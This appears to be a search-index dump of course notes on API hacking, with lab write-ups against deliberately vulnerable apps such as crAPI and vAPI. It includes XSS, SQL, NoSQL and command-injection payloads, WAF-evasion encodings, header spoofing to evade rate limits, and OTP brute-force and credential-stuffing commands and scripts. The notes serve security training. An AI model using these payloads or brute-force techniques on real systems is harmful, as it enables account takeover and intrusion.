                                  Here is an example of a NULL byte included in an XSS payload combined with a SQL injection attack.

                                  POST /api/v1/user/profile/update\n--snip--\n\n     {\n        \u201cusername\u201d: \u201c<%00script>alert(1);</%00script>\u201d\n        \u201cpass\u201d:\u00a0\"%00'OR 1=1\"\n}\n
                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#3-bypassing-controls-with-case-switching","title":"3. Bypassing controls with case switching","text":"

                                  Switching the case of characters in the payload may keep the WAF from detecting the attack.
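
                                  For instance, a classic XSS payload could be case-switched like this (a minimal illustration):

                                  <sCrIpT>alert(1)</sCrIpT>\n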

                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#4-bypassing-controls-by-encoding-payloads","title":"4. Bypassing controls by encoding payloads","text":"

                                  If you are using Burp Suite, the module Decoder is perfect for quickly encoding or decoding a payload.

                                  Trick: double-encode your payload.
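
                                  A quick illustration of double URL-encoding (each % from the first pass becomes %25 in the second):

                                  ' OR 1=1\n%27%20OR%201%3D1             # single URL-encoded\n%2527%2520OR%25201%253D1     # double URL-encoded\n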

                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#tools","title":"Tools","text":"","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#1-burpsuite-intruder","title":"1. BurpSuite Intruder","text":"

                                  Also, once you know which encoding technique is the effective one for bypassing the WAF, use BurpSuite Intruder (section Payload processing under the Intruder Payload options) to configure your attack. Intruder has some more worthwhile options.

                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#2-wfuzz","title":"2. wfuzz","text":"

                                  wfuzz Cheat sheet.

                                  # Check which wfuzz encoders are available\nwfuzz -e encoders\n\n# To use an encoder, add a comma to the payload and specify the encoder name\nwfuzz -z file,path/to/payload.txt,base64 http://hacking-example.com/api/v2/FUZZ\n\n# Using multiple encoders. Each payload will be processed in separate requests.\nwfuzz -z list,a,base64-md5-none\n# this results in three payloads: one encoded in base64, another in md5 and the last with none\n\n# Each payload will be processed by multiple encoders.\nwfuzz -z file,payload1-payload2,base64@md5@random_upper -u http://hacking-example.com/api/v2/FUZZ\n
                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#testing-rate-limits","title":"Testing rate limits","text":"","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#rate-limits-what-for","title":"Rate limits. What for?","text":"
                                  • To avoid incurring additional costs associated with computing resources.
                                  • To avoid falling victim to a DoS attack.
                                  • To monetize.
                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#how-to-know-if-rate-limit-is-in-place","title":"How to know if rate limit is in place","text":"
                                  • Consult API documentation.
                                  • Check the API's headers (x-rate-limit, x-rate-limit-remaining, retry-after).
                                  • See response code 429.
                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#techniques","title":"Techniques","text":"

                                  1. Throttle your scanning

                                  In wfuzz:

                                  # Units are specified in seconds\n-s  Specify a time delay between requests.\n-t Specify the concurrent number of connections\n

                                  In BurpSuite:

                                  Set up Intruder's Resource Pool to limit the rate (in milliseconds).\n

                                  2. Bypassing paths

                                  Altering the URL path slightly could cause the API provider to handle the request differently, potentially bypassing the rate limit.

                                  • Adding null bytes.
                                  • Altering the string randomly with various upper- and lowercase letters.
                                  • Adding meaningless parameters.

                                  3. Modifying Origin headers

                                  When the API provider uses headers to enforce rate limiting, you could manipulate them (see the sketch after this list):

                                  • X-Forwarded-For
                                  • X-Forwarded-Host
                                  • X-Host
                                  • X-Originating-IP
                                  • X-Remote-IP
                                  • X-Client-IP
                                  • X-Remote-Addr
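
                                  A minimal sketch with curl (the endpoint is a placeholder):

                                  curl -H \"X-Forwarded-For: 127.0.0.1\" http://target.example/api/v1/endpoint\n# vary the spoofed IP between requests if the limit is keyed on this header\n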

                                  4. Modifying User-agent header

                                  You can use this dictionary: SecLists.

                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#rotating-ip-addresses-with-burpsuite","title":"Rotating IP addresses with BurpSuite","text":"

                                  Add the extension IP Rotate.

                                  Requirements to install IP Rotate and have it working:

                                  • Install the tool Boto3.
                                  pip3 install boto3\n
                                  • Install the Jython standalone file from https://www.jython.org/download.html.
                                  • You will need an AWS account in which you can create an IAM user. There is a small cost associated with using the AWS API gateway. From the IAM Services page, click Add Users and create a user account with programmatic access selected. On the \"Set Permissions\" page, select \"Attach Existing Policies Directly\". Next, filter policies by searching for \"API\". Select the \"AmazonAPIGatewayAdministrator\" and \"AmazonAPIGatewayInvokeFullAccess\" permissions. Proceed to the review page. No tags needed. Skip ahead and create the user. Now, download the CSV file containing your user's access key.
                                  • Install IP Rotate
                                  • Open the IP Rotate Module and copy and paste access key from the user added in IAM service.
                                  ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/","title":"Exploiting API Authorization","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups
                                  ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#bola-broken-object-level-authorization","title":"BOLA - Broken Object Level Authorization","text":"

                                  A BOLA vulnerability allows UserA to request UserB's resources.

                                  ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#methodology","title":"Methodology","text":"
                                  1. Create a UserA account.
                                  2. Use the API and discover requests that involve resource IDs as UserA.
                                  3. Document requests that include resource IDs and should require authorization.
                                  4. Create a UserB account.
                                  5. Obtain a valid UserB token and attempt to access UserA's resources.

                                  You could also do this by using UserB's resources with a UserA token.
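
                                  A minimal sketch of that swap with curl, using one of crAPI's resource endpoints (the IDs and token are placeholders):

                                  curl -H \"Authorization: Bearer <UserB_token>\" http://localhost:8888/identity/api/v2/vehicle/<UserA_vehicle_id>/location\n# a 200 with UserA's location data instead of a 403 indicates BOLA\n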

                                  ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#bfla-broken-function-level-authorization","title":"BFLA - Broken Function Level Authorization","text":"

                                  BFLA is about UserA requesting to create, update, post or delete object values that belong to UserB.

                                  • BFLA request with lateral actions: UserA has the same role or privilege level as UserB.
                                  • BFLA request with escalated actions: UserB has a higher privilege level, and UserA is able to perform actions reserved for UserB.

                                  Basically, BFLA attacks consist of testing various HTTP methods, seeking out actions of other users that you shouldn't be able to perform. Important: be careful with DELETE requests.

                                  ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#methodology_1","title":"Methodology","text":"
                                  1. Postman. Go through the collection and select requests for resources of UserA. Focus on resources for private information. Focus also on HTTP verbs such as PUT, DELETE, POST.
                                  2. Swap out your UserA token for UserB's.
                                  3. Send GET, PUT, POST, and DELETE requests for UserA's resources using UserB's token.
                                  4. Investigate 200 and 401 response codes, and responses with strange lengths.

                                  BFLA testing pays special attention to requests that perform actions requiring authorization.

                                  ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#tools","title":"Tools","text":"
                                  • Postman: use the collection variables. Create specific collections for attacks.
                                  • BurpSuite: use the Match and Replace functionality (tab Proxy > Options) to perform a large-scale replacement of a variable like an authorization token.
                                  ","tags":["api"]},{"location":"hackingapis/improper-assets-management/","title":"Testing for improper assets management","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

                                  Testing for improper assets management is all about discovering unsupported and non-production versions of an API.

                                  ","tags":["api"]},{"location":"hackingapis/improper-assets-management/#finding-api-versions","title":"Finding API versions","text":"

                                  Paths to check out:

                                  api.target.com/v3\n/api/v2/accounts\n/api/v3/accounts\n/v2/accounts\n

                                  API versioning could also be maintained as a header:

                                  Accept: version=2.0\nAccept api-version=3\n

                                  In addition, versioning could also be set within a query parameter or request body.

                                  /api/accounts?ver=2\nPOST /api/accounts\n\n{\n\"ver\":1.0,\n\"user\":\"hapihacker\"\n}\n

                                  Non-production versions of an API might not be protected by the same security controls as the production version, which makes discovering them valuable.

                                  ","tags":["api"]},{"location":"hackingapis/improper-assets-management/#exploiting-non-production-old-and-deprecate-api-versions","title":"Exploiting non-production, old and deprecate api versions","text":"

                                  We'll use Postman, assuming that we have built our collection of requests and identified the parameters related to API versioning.

                                  0. Right-click on the collection and select \"Run Collection\". In the following screen you can unmark the requests that don't need to be run. But first, define a test.

                                  1. Run a test \"Status code: Code is 200\". In your collection options, go to tab Test and select the option that gives you this code:

                                  pm.test(\"Status code is 200\", function () { pm.response.to.have.status(200); })\n

                                  2. Run an unauthenticated baseline scan of the crAPI collection with the Collection Runner. Make sure that \"Save Responses\" is checked. Important: review the results from your unauthenticated baseline scan to get an idea of how the API provider responds to requests using supported production versioning. After that, repeat the same scan, this time as an authenticated user, to obtain an authenticated baseline.

                                  3. Next, use \"Find and Replace\" to turn the collection's current versions into a variable. For that, use Environmental variables.

                                  4. Run the collection with the variable set to v1, v2, v3, mobile, internal, test, uat..., and check out the different responses.

                                  In the course, we are using the crAPI app, and by replicating these steps you can spot different code responses for the request {{base_url}}/identity/api/auth/{{var}}/check-otp.\n/v1 received a 404 Not Found\n/v2 received a 500 response\n/v3 received a 500 response\n\nAlso, the body response in /v2 is different from the body response in /v3:\n\nThe /v2 password reset request responds with the body:\n{\"message\":\"Invalid OTP! Please try again..\",\"status\":500}\n\nThe /v3 password reset request responds with the body:\n{\"message\":\"ERROR..\",\"status\":500}\n\nThat might be a sign of improper assets management. Going further and testing it, you can discover that /v2 does not have a limitation on the number of times we can guess the OTP. With a four-digit OTP, we should be able to brute-force the OTP within 10,000 requests. Since this endpoint manages resetting passwords, in the end this vulnerability allows you to gain control of any account in the system.\n
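
                                  A hedged wfuzz sketch of that /v2 OTP brute force (the body field names are assumptions based on crAPI's password-reset flow; match them to your captured request):

                                  seq -w 0 9999 > otps.txt\nwfuzz -z file,otps.txt -H \"Content-Type: application/json\" -d '{\"email\":\"victim@example.com\",\"otp\":\"FUZZ\",\"password\":\"NewPass123!\"}' --hc 500 http://localhost:8888/identity/api/auth/v2/check-otp\n# --hc 500 hides the \"Invalid OTP\" responses so only a hit stands out\n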
                                  ","tags":["api"]},{"location":"hackingapis/injection-attacks/","title":"Injection Attacks","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

                                  The art of fuzzing is knowing which payload to send in the right request with the right tool.

                                  • The right payload can be narrowed down with reconnaissance.
                                  • The right requests are those that include user input (plus headers and URL paths).
                                  • The right tool depends on your fuzzing strategy.

                                  Yes, when fuzzing we need a strategy.

                                  1. Identify endpoints (those where client input can interact with a database).

                                  2. Fuzz the endpoints and capture the responses.

                                  3. Analyze responses:

                                  - Verbose error message\n- Response code\n- Time in response.\n

                                  4. Identify the technology, version, backend services, and security controls.

                                  ","tags":["api"]},{"location":"hackingapis/injection-attacks/#sql-injections","title":"SQL injections","text":"

                                  More about SQL injections. | How to perform a manual SQL attack | Simple payloads | Tools: SQLmap

                                  ","tags":["api"]},{"location":"hackingapis/injection-attacks/#nosql-injections","title":"NOSQL injections","text":"

                                  Simple payloads.

                                  APIs commonly use NoSQL databases because they scale well. These databases have unique structures and modes of querying. Requests will look alike, but payloads may vary.

                                  ","tags":["api"]},{"location":"hackingapis/injection-attacks/#operating-system-command-injection","title":"Operating System Command Injection","text":"

                                  Simple payloads

                                  Some common operating system commands used in injection attacks:

                                  • ipconfig
                                  • dir
                                  • ver
                                  • whoami
                                  • ifconfig
                                  • ls
                                  • pwd
                                  • whoami

                                  Target:

                                  • URL query string
                                  • Request parameters
                                  • Headers
                                  • Requests that throw verbose error messages

                                  Techniques:

                                  • Pairing multiple commands in a single line (see the separators sketched below).
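
                                  For example, these separators can pair an injected command with the expected input (simple payloads to try in each target location):

                                  ; whoami\n&& whoami\n| whoami\n%0a whoami    # URL-encoded newline\n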
                                  ","tags":["api"]},{"location":"hackingapis/injection-attacks/#xss-cross-site-scripting","title":"XSS Cross-Site Scripting","text":"

                                  More about Cross-Site Scripting | Simple payloads

                                  ","tags":["api"]},{"location":"hackingapis/injection-attacks/#using-wfuff","title":"Using wfuff","text":"

                                  Having this request:

                                  POST /community/api/v2/coupon/validate-coupon HTTP/1.1\nhost: localhost:8888\naccept: */*\norigin: http://localhost:8888\nreferer: http://localhost:8888/shop\nConnection: close\nuser-agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\ncontent-type: application/json\nContent-Length: 29\nsec-fetch-dest: empty\nsec-fetch-mode: cors\nsec-fetch-site: same-origin\nAccept-Encoding: gzip, deflate\naccept-language: en-US,en;q=0.5\nAuthorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyNTU1NUBoYXBpaGFjaGVyLmNvbSIsImlhdCI6MTY3NTY5NjY3NiwiZXhwIjoxNjc1NzgzMDc2fQ.2_B9Rh_kERjiz4J4c4kIRjktNJ3s4jXOPRCJrLlOJrXV5cC-SgYDF3BxcBDzDJTqZTNtS26-fnprUr9bdenAeg\nCache-Control: no-cache\nPostman-Token: 5eb2f69b-6f89-460b-a49f-96c12edc9906\n\n{\"coupon_code\":{\"$ne\":\"-1\"} }\n

                                  And this response:

                                  HTTP/1.1 200 OK\nServer: openresty/1.17.8.2\nDate: Mon, 06 Feb 2023 16:05:31 GMT\nContent-Type: application/json\nConnection: close\nAccess-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization\nAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE\nAccess-Control-Allow-Origin: *\nContent-Length: 79\n\n{\"coupon_code\":\"TRAC075\",\"amount\":\"75\",\"CreatedAt\":\"2022-11-11T19:22:26.134Z\"}\n

                                  We can use wfuzz like this:

                                  wfuzz -z file,/usr/share/wordlists/nosql.txt -H \"Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyNTU1NUBoYXBpaGFjaGVyLmNvbSIsImlhdCI6MTY3NTY5NjY3NiwiZXhwIjoxNjc1NzgzMDc2fQ.2_B9Rh_kERjiz4J4c4kIRjktNJ3s4jXOPRCJrLlOJrXV5cC-SgYDF3BxcBDzDJTqZTNtS26-fnprUr9bdenAeg\" -H \"Content-Type: application/json\" -d \"{\\\"coupon_code\\\":FUZZ}\" --sc 200 -p localhost:8080 http://localhost:8888/community/api/v2/coupon/validate-coupon\n# -p localhost:8080 Redirect traffic to BurpSuite\n# --sc 200 Show code response 200\n
                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/","title":"Mass assignment","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups
                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/#what-is-mass-asset-management","title":"What is mass asset management?","text":"

                                  Basically, the frontend tells UserA that they can post/update an object, and we use that request to post/update a different object or attribute. We are sending a request that updates or overwrites server-side variables.

                                  Example:

                                  In a login process, you are told you can send these parameters:

                                  {\n    \"username\":\"user22\",\n    \"password\":\"Password1\",\n    }\n

                                  But you send this:

                                  {\n    \"username\":\"user22\",\n    \"password\":\"Password1\",\n    \"credit\":10000\n}\n

                                  And now your newly created user will have a credit of 10,000 units.

                                  Other key-value pairs that you could include in the JSON POST body:

                                  \"isadmin\": true,  \n\"isadmin\":\"true\",  \n\"admin\": 1,  \n\"admin\": true,\n

                                  The key thing with this vulnerability is to identify vectors and entry points.

                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/#methodology","title":"Methodology","text":"

                                  Identify endpoints that accept user input in your collection and that have the potential to modify objects. In the crAPI application this was about taking a BFLA to the next level:

                                  • Changing the request \"GET /workshop/api/shop/products\" (which displays existing products) to \"POST /workshop/api/shop/products\" made the app respond with a 400 Bad Request code and information suggesting fields for a POST request. Basically, this POST request is a way to alter or create store products, so we can create our own product items.
                                  • Now we can create a product with a negative price. Acquiring that item will give you credit! (A sketch of this request follows below.)
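
                                  A hedged sketch of that request (field names taken from the suggestions in the 400 response; values and token are placeholders):

                                  curl -X POST http://localhost:8888/workshop/api/shop/products -H \"Authorization: Bearer <token>\" -H \"Content-Type: application/json\" -d '{\"name\":\"MassAssignment\",\"price\":-10000,\"image_url\":\"test.png\"}'\n# buying the negative-price product credits the account instead of charging it\n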
                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/#finding-mass-assignment-targets","title":"Finding Mass assignment targets","text":"

                                  To discover and exploit mass assignment vulnerabilities, search for API requests that accept and process client input:

                                  1. Account registration

                                   - Intercept the web request\n- Craft this request with admin variables that you can set from API documentation\n

                                  2. Unauthorized access to organizations: If your user's objects belong to an organization with access to sensitive data, attempt to gain access to that organization.

                                  3. Resetting passwords, updating accounts, profiles or organizational objects: Do not limit yourself to the account registration process.

                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/#tools","title":"Tools","text":"

                                  BurpSuite Intruder + Param Miner, and Arjun.

                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/#using-param-miner-extension","title":"Using Param Miner extension","text":"

                                  1. Spot sections focused on privileged actions. Some headers like:

                                  - Token: AdminToken\n- Or, in the JSON of the body: isadmin: true\n

                                  A nice way to do this is with the Burp extension Param Miner.

                                  Param Miner can be downloaded from the BApp Store in BurpSuite. To run it, right-click on a request (for instance, a request in Repeater) and select Extensions > Param Miner > Guess params > Guess JSON parameter.

                                  Now, go to the Extender tab > Extensions. In the box below, select the Output tab, and then \"Show in UI\".

                                  After a while you will see results from the attack.

                                  With Param Miner you can fuzz unknown variables.

                                  ","tags":["api"]},{"location":"hackingapis/mass-assignment/#arjun","title":"Arjun","text":"

                                  More about arjun.

                                  Arjun is a great tool for finding query parameters in URL endpoints.

                                  Advantages:

                                  • Supports GET/POST/POST-JSON/POST-XML requests.
                                  • It deals with rate limits and timeouts.

                                  # Run arjun against a single URL\narjun -u https://api.example.com/endpoint\n\n# arjun will provide you with likely parameters from a wordlist. Its results are based on the deviation of response lengths/codes\narjun --headers \"Content-Type: application/json\" -u http://api.example.com/register -m JSON --include='{$arjun}' --stable\n# -m Get method parameters GET/POST/JSON/XML\n# -i Import targets (a txt list)\n# --include Specify injection point, for example:\n        #  --include='<?xml><root>$arjun$</root>\n        #  --include='{\"root\":{\"a\":\"b\",$arjun$}}'\n

                                  Awesome wiki about arjun usage: https://github.com/s0md3v/Arjun/wiki/Usage.

                                  ","tags":["api"]},{"location":"hackingapis/other-labs/","title":"Setting up the labs + Writeups","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

Here we'll be practising what we have learned in the course. There are plenty of labs in the wild; my intention here is to cover only the well-known ones.

To see it through to the end, I will also include writeups for every lab.

                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#setting-up-crapi","title":"Setting up crAPI","text":"

                                  Download it from: https://github.com/OWASP/crAPI

                                  mkdir ~/lab\ncd ~/lab\nsudo curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml\nsudo docker-compose pull\nsudo docker-compose -f docker-compose.yml --compatibility up -d\n
                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#setting-up-other-labs","title":"Setting up other labs","text":"

                                  Besides \"crapi\" and \"vapi\", the book \"Hacking APIs\" indicates some other interesting labs. Following chapter 5 of Hacking APIs book (\"Setting up vu\u00f1nerable API targets\"), I have installed:

                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#vapi-app","title":"vapi app","text":"

                                  Source: https://github.com/roottusk/vapi

APIs have become a critical element of the security landscape. In 2019, OWASP released a list of the top 10 API security vulnerabilities for the first time. vAPI stands for Vulnerable Adversely Programmed Interface, and it's a self-hostable PHP interface that mimics OWASP API Top 10 scenarios.

                                  Install

# Prerequisite: have docker up and running\n# Under /home/kali/labs\ngit clone https://github.com/roottusk/vapi.git\ncd vapi\ndocker-compose up -d\n

                                  Setting up Postman

                                  • Go to https://www.postman.com/roottusk/workspace/vapi/
                                  • Locate and import vAPI.postman_collection.json in Postman
• Locate and import vAPI_ENV.postman_environment.json in Postman
                                  • Configure the collection to use vAPI_ENV
                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#owasp-devslop-pixi","title":"OWASP DevSlop Pixi","text":"

Pixi is a MongoDB, Express.js, Angular, Node (MEAN) stack web application that was designed with deliberately vulnerable APIs.

                                  To install it:

cd ~/lab\ngit clone https://github.com/DevSlop/Pixi.git\n

                                  To run it:

                                  cd ~/lab\nsudo docker-compose up\n

                                  Now, in the browser, go to: http://localhost:8000/login

                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#owasp-juice-shop","title":"OWASP Juice Shop","text":"

                                  Juice Shop encompasses vulnerabilities from the entire OWASP Top Ten along with many other security flaws found in real-world applications.

To install, go to the GitHub page (https://github.com/juice-shop/juice-shop) and follow the instructions.

                                  To run it:

                                  sudo docker run --rm -p 3000:3000 bkimminich/juice-shop\n

                                  Now, in the browser, go to: http://localhost:3000/#/

                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#damn-vulnerable-graphql-application","title":"Damn-Vulnerable-GraphQL-Application","text":"

Damn Vulnerable GraphQL Application (DVGA) is a deliberately vulnerable GraphQL application that can be used to learn about GraphQL/API-related vulnerabilities.

                                  To install, see the github page: https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application

                                  To run it:

                                  sudo docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 dvga\n

                                  Now, in the browser, go to: http://localhost:5013/

                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#writeups","title":"Writeups","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#vapi-writeup","title":"VAPI Writeup","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api1","title":"Writeup: API1","text":"

Tip provided by vAPI: Broken Object Level Authorization. You can register yourself as a User. That's it... or is there something more?

                                  Solution:

                                  • Postman: Under folder API0, send a request to Create User. When done, the vAPI_ENV will be filled with two more variables: api1_id, api1_auth.
• Postman: Under folder API1, send a request to Get User. Initially you will get the user you created, BUT if you modify api1_id in the vAPI_ENV environment, you will receive the data of, say, the user with id 1. Or 2. Or 3. Or... Tadam! BOLA. (A scripted version follows below.)
                                  • The flag is in user with id 1. See the response body:
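
The same BOLA check can be scripted outside Postman. A minimal sketch, assuming the route /vapi/api1/user/<id> and the Authorization-Token header used by the collection (verify both there; api1_auth is the token captured during Create User):

import requests\n\nBASE = 'http://localhost' # vAPI host\nTOKEN = '<api1_auth value from Postman>' # token returned by Create User\n\n# Iterate over other users' IDs; route and header name are assumptions taken from the collection\nfor user_id in range(1, 11):\n    r = requests.get(BASE + '/vapi/api1/user/' + str(user_id), headers={'Authorization-Token': TOKEN})\n    print(user_id, r.status_code, r.text[:120])\n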
                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api2","title":"Writeup: API2","text":"

Tip provided by vAPI: Broken Authentication. We don't seem to have credentials for this, how do we log in? (There's something in the Resources folder given to you.)

                                  Solution:

                                  • Download creds.csv from https://raw.githubusercontent.com/roottusk/vapi/master/Resources/API2_CredentialStuffing/creds.csv.
                                  • Execute:
                                  cat creds.csv | cut -d, -f1 >users.txt\ncat creds.csv | cut -d, -f3 >pass.txt\n
• Turn Intercept ON in Burp, enable FoxyProxy at 8080 in the browser, and enable the proxy in Postman at 8080.
                                  • Postman: Under folder API2, send a POST request to login and intercept it with Burp.
• Burp: send the request to Intruder. Use a Pitchfork attack with two payload sets (Simple list): the first is users.txt, the second pass.txt. Careful: disable URL encoding when setting up the payloads.
                                  • Burp: sort by Code (or length). You will get credentials for three users.
• Postman: Log in with each user's credentials and save the request as an example, in case you need to come back to it.
• Postman: Once you are logged into the app, a new environment variable is saved in vAPI_ENV: api2_auth. With this authentication we can now resend the Get Details request; the flag will be in the response. (A scripted version of the stuffing step follows below.)
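
The Intruder step can also be scripted. A minimal credential-stuffing sketch, assuming the login route /vapi/api2/user/login and JSON fields email/password (verify both in the collection):

import csv\nimport requests\n\nBASE = 'http://localhost' # vAPI host; route and field names are assumptions\n\nwith open('creds.csv', newline='') as f:\n    for row in csv.reader(f):\n        if len(row) < 3:\n            continue\n        email, password = row[0], row[2] # same columns the cut commands above extract\n        r = requests.post(BASE + '/vapi/api2/user/login', json={'email': email, 'password': password})\n        if r.status_code == 200: # valid pairs stand out by status code/length\n            print('[+] Valid:', email, password)\n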
                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api3","title":"Writeup: API3","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api4","title":"Writeup: API4","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api5","title":"Writeup: API5","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api6","title":"Writeup: API6","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api7","title":"Writeup: API7","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api8","title":"Writeup: API8","text":"","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api9","title":"Writeup: API9","text":"

In this lab we'll be testing for improper assets management. The endpoint provided in the Postman collection is:

                                  Several interesting things to test:

• Only a 4-digit PIN code is required to log in.
• We are running this request against version 2 (v2) of the API.
                                  • There are two significant headers:
                                    • X-RateLimit-Limit set to 5
• X-RateLimit-Remaining set to 4.

With this in mind, we can run the request six times, obtaining a 500 Internal Server Error instead of the 200 response:

But if we send the same POST request with v2 changed to v1 in the path, then:

                                  Headers \"X-RateLimit-Limit\" and \"X-RateLimit Remaining\" are missing. Looks like there is no Rate limit set for this request and a Brute Force attack can be conducted. So we do it using Burp Intruder and... bingo! we have the flag:

                                  ","tags":["api"]},{"location":"hackingapis/other-labs/#writeup-api10","title":"Writeup: API10","text":"","tags":["api"]},{"location":"hackingapis/scanning-apis/","title":"Scanning APIs","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

                                  Once you have discovered an API and used it as it was intended, you can proceed to perform a baseline vulnerability scan. Most of these scans return false-negative results (because they are web-oriented) but they are helpful in structuring next steps.

                                  Basic scans you can run:

                                  ","tags":["api"]},{"location":"hackingapis/scanning-apis/#nikto","title":"nikto","text":"

Run:

nikto -h http://localhost:8888\n

You will get some results related to headers, such as:

• The anti-clickjacking X-Frame-Options header is not present.
• The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS.
• The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
                                  ","tags":["api"]},{"location":"hackingapis/scanning-apis/#owasp-zap","title":"OWASP zap","text":"

                                  To launch it, run:

                                  zaproxy\n

                                  You can do several things:

                                  • Run an automatic attack.
                                  • Import your spec.yml file and run an automatic attack.
                                  • Run a manual attack.

                                  The manual explore option will allow you to perform authenticated scanning. Set the URL to your target, make sure the HUD is enabled, and choose \"Launch Browser\".

                                  ","tags":["api"]},{"location":"hackingapis/scanning-apis/#how-to-run-a-manual-attack","title":"How to run a manual attack","text":"

                                  Select \"Continue to your target\". On the right-hand side of the HUD, you can set the Attack Mode to On. This will begin scanning and performing authenticated testing of the target. Now you perform all the actions (sign up a new user, log in into the account, modify you avatar, post a comment...).

After that, OWASP ZAP allows you to narrow the results to your target. How? In the Sites module, right-click on your site and select \"Include in context\". Then click on the target-shaped icon to filter sites by context.

With the results, start your analysis and weed out the false positives.

                                  ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/","title":"SSRF attack - Server side Request Forgery","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

                                  This vulnerability allows an attacker to supply URLs that expose private data, scan the target's internal network, or compromise the target through remote code execution.

                                  ","tags":["api"]},{"location":"hackingapis/server-side-request-forgery-ssrf/#identify-endpoints","title":"Identify endpoints","text":"

Read through your collection thoroughly and search for requests that:

• Include full URLs in the POST body or parameters
• Include URL paths (or partial URLs) in the POST body or parameters
• Include headers that contain URLs, like Referer
• Allow user input that may result in the server retrieving resources
